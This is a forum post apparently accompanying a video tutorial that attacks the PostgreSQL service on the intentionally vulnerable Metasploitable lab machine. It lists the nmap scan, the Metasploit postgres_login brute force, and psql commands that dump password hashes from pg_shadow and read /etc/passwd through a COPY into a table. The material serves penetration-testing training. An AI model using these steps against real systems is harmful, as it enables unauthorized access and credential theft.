Results 1 to 1 of 1

Thread: [Video] Metasploitable - PostgreSQL

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] Metasploitable - PostgreSQL

    Watch video on-line:

    What is this?
    This video demonstrates an attack on the PostgreSQL database service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." -

    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > By using PostgreSQL client we are able to send commands to the database (Discover password hashes and reading files)

    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > MySQL --- on Backtrack 4 (Final)
    > Dictionaries/Word-lists --- defaults with metasploit work (/pentest/exploits/framework3/data/wordlists)
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar ~ (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar ~ (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar ~ (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar ~ (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
    nmap -sS -sV -O -f -n
    search postgresql
    use scanner/postgres/postgres_login
    show options 
    set RHOSTS
    psql -h -U postgres -W
    select usename, passwd from pg_shadow;
    select current_database();
    create table myfile (input TEXT); copy myfile from '/etc/passwd';select input from myfile;
    Song: Carl Cox - Phoebus Apollo
    Video length: 3:24
    Capture length: 5:58

    Blog Post:
    Forum Post:
    Last edited by g0tmi1k; 03-05-2011 at 02:12 PM.
    Have you...g0tmi1k?

Similar Threads

  1. Owning Metasploitable with Backtrack
    By sickness in forum BackTrack Videos
    Replies: 17
    Last Post: 11-02-2010, 02:12 PM
  2. Metasploitable
    By thorin in forum Beginners Forum
    Replies: 1
    Last Post: 05-25-2010, 07:07 PM
  3. Nexpose Postgresql error
    By WolverineOD in forum Beginners Forum
    Replies: 1
    Last Post: 05-02-2010, 04:45 PM
  4. errore: postgresql-8.3
    By xanders in forum Supporto Software
    Replies: 10
    Last Post: 11-21-2009, 09:34 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts